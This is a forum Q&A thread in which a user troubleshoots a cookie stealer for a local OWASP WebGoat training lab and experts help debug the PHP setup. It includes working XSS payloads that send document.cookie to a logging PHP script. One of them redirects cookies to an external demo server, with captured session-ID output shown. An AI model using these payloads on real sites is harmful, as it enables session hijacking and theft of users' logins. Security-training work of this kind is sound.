Still celebrating National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17

x
?
Solved

How to call a PHP script from Javascript in HTML

Posted on 2014-11-16
13
Medium Priority
?
125 Views
Last Modified: 2014-11-18
Hello experts,
 
  I'm trying to construct a basic cookie stealer.  I have Javascript in an HTML doc that calls a PHP file and passes it the value of the session cookie.  Now, I'm able to run the PHP file by itself and it creates the specified file, but when I open the basic HTML doc I only see the text of the PHP file in the browser window, and no text file is written in the PHP dir.  I've been scratching my head for a few hours this morning and am not sure what I'm doing wrong.  I've tried both var assignment and properties such as document.location in the HTML file:

HTML doc:
<script language="Javascript">
 document.location = "http://localhost:8080/WebGoat/cookiestealer.php?cookie=" + escape(document.cookie);
</script>

Open in new window


cookiestealer.php:
<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>

Open in new window


  This is probably something silly I'm overlooking.  Any ideas?
0
Comment
Question by:dilligent
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 5
  • 4
  • 4
13 Comments
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 40445772
We can't really see the sequence of events here, but it may be possible that things are running in an out-of-order sequence.  The PHP scripts are run on the server and are complete before the HTML document is transmitted to the client and the JavaScript gets control.  And some cookies are settable in ways that hide them from JavaScript completely. One possibility might be to use AJAX to send the stolen cookies back to the server.  But whatever you do with something like this, beware that you will likely offend people if you try to gain access to their personally identifiable information without their permission.  In some places, this is a criminal activity with penalties that involve handcuffs and prison time, so tread lightly and do not do this to any client who has not given you explicit permission.  To protect yourself, you should probably insist on written permission!
0
 

Author Comment

by:dilligent
ID: 40445777
This is all in my OWASP WebGoat install on my local VM.  I understand that I can use AJAX, but it was my understanding that my setup should steal my session cookie and write it to a file on my VM.
0
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 40445784
For obvious reasons I am not going to leave these scripts on my server, but this tests out correctly.  Here is the server-side "Ajax" script:
<?php // demo/temp_dilligent_server.php
error_reporting(E_ALL);
date_default_timezone_set('America/Chicago');

// SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html

// START THE OUTPUT BUFFER TO CAPTURE THE var_dump() DISPLAY
ob_start();

// MAKE THE OUTPUT EASY TO READ
echo '<pre>';

// SEND BACK THE DATE...
echo date('r');
echo  PHP_EOL;

// ... AND THE GET-REQUEST VARIABLES
echo 'GET: ';
var_dump($_GET);

// ... AND THE POST-REQUEST VARIABLES
echo 'POST: ';
var_dump($_POST);

echo '</pre>';
echo  PHP_EOL;

Open in new window


And here is the client-side script that sends the data to the server.

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<!-- // SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.min.js"></script>
<script>
$(document).ready(function(){
    /* GRAB ANY COOKIES THAT JAVASCRIPT CAN SEE */
    var cookies = escape(document.cookie);
    /* SEND THE COOKIES TO THE SERVER */
    $.post("temp_dilligent_server.php", {myArg:cookies}, function(response){
        $("#output p#target").html(response);
    });
});
</script>

<title>E-E Q_28563154</title>
</head>
<body>

<noscript>Unable to steal cookies: JavaScript is not enabled!</noscript>

<div   id="output">
   <p  id="static">HERE ARE THE STOLEN COOKIES</p>
   <p  id="target">This element gets the AJAX response</p>
</div>

</body>
</html>

Open in new window

0
Concerto Cloud for Software Providers & ISVs

Can Concerto Cloud Services help you focus on evolving your application offerings, while delivering the best cloud experience to your customers? From DevOps to revenue models and customer support, the answer is yes!

Learn how Concerto can help you.

 
LVL 111

Expert Comment

by:Ray Paseur
ID: 40445785
Let me see if I can get it to work with the document.location redirect.  If you haven't tried them, make a search for Google Dev Tools -- very helpful for things like this exercise.
0
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 40445789
This worked for the front-end script and it echoed the appropriate data:
<script language="Javascript">
document.location = "http://iconoun.com/demo/temp_dilligent_server.php?cookie=" + escape(document.cookie);
</script>

Open in new window

Output:
Sun, 16 Nov 2014 09:52:05 -0600
GET: array(1) {
  ["cookie"]=>
  string(51) "lang=de; PHPSESSID=d89beaeb16ef3d03a85d7ec1aa468133"
}
POST: array(0) {
}

Open in new window

I don't see any material difference between your scripts and mine, so you might want to step through the data visualization process using alert() and echo.
0
 

Author Comment

by:dilligent
ID: 40445846
I don't know what to say.  I see the entry in my access logs, and I see via Dev Tools and Fiddler that the cookie is indeed passed.  The problem is that the PHP doc is treated as text and is not executed.  No file is written, no statements are echoed if the .php file is changed.

Remote Address:127.0.0.1:8080
Request URL:http://localhost:8080/WebGoat/cookiestealer.php?cookie=
Request Method:GET
Status Code:200 OK
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Cookie:JSESSIONID=FD2AF7912076525990DF420CF1E3D6D3
Host:localhost:8080
User-Agent:Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Query String Parametersview sourceview URL encoded
cookie:**********************
Response Headersview source
Accept-Ranges:bytes
Content-Length:174
Date:Sun, 16 Nov 2014 16:59:50 GMT
ETag:W/"174-1416157027159"
Last-Modified:Sun, 16 Nov 2014 16:57:07 GMT
Server:Apache-Coyote/1.1
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 40445904
You can start with the fact that Chrome will not allow a cookie to be set on 'localhost'.  The reason is that 'localhost' is not a unique domain.  The same is true with any page loaded with 'file://'.

My cookie test pages seem to work in Chrome with an IP address thru my web server on this machine.
0
 

Author Comment

by:dilligent
ID: 40446024
Regardless of whether or not I execute from localhost or change the URL and execute from my host machine while pointing to the VM, I still get no PHP file execution, and instead just get a 200 (or 304 if I repeat without clearing cookies) with the literal reponse back:

<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 40446193
I copied your code and made adjustments for my web server and it works ok.  I think that you do not have PHP installed on your web server or at least not on the Apache-Coyote/1.1 part of it.
0
 

Author Comment

by:dilligent
ID: 40446223
Hmmm, so I need it installed on the app server itself, in addition to the app server box?  That is new to me, if so.  I'll look into this and get back to this question.
0
 
LVL 84

Accepted Solution

by:
Dave Baldwin earned 2000 total points
ID: 40446279
Standard Apache installs have some extra code that tells them when to run PHP code thru the PHP interpreter, it is not automatic.  If PHP is already installed on the server, it's the part that tells the web server to use the PHP interpreter to run the PHP code that you need.
0
 

Author Closing Comment

by:dilligent
ID: 40449925
Thank you.  I'll install PHP on my Tomcat instance, as I'm fairly certain that this is the problem.
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 40450659
You're welcome.
0

Featured Post

Free Tool: Subnet Calculator

The subnet calculator helps you design networks by taking an IP address and network mask and returning information such as network, broadcast address, and host range.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Build an array called $myWeek which will hold the array elements Today, Yesterday and then builds up the rest of the week by the name of the day going back 1 week.   (CODE) (CODE) Then you just need to pass your date to the function. If i…
These days socially coordinated efforts have turned into a critical requirement for enterprises.
The viewer will learn how to dynamically set the form action using jQuery.
The viewer will learn how to create and use a small PHP class to apply a watermark to an image. This video shows the viewer the setup for the PHP watermark as well as important coding language. Continue to Part 2 to learn the core code used in creat…

670 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question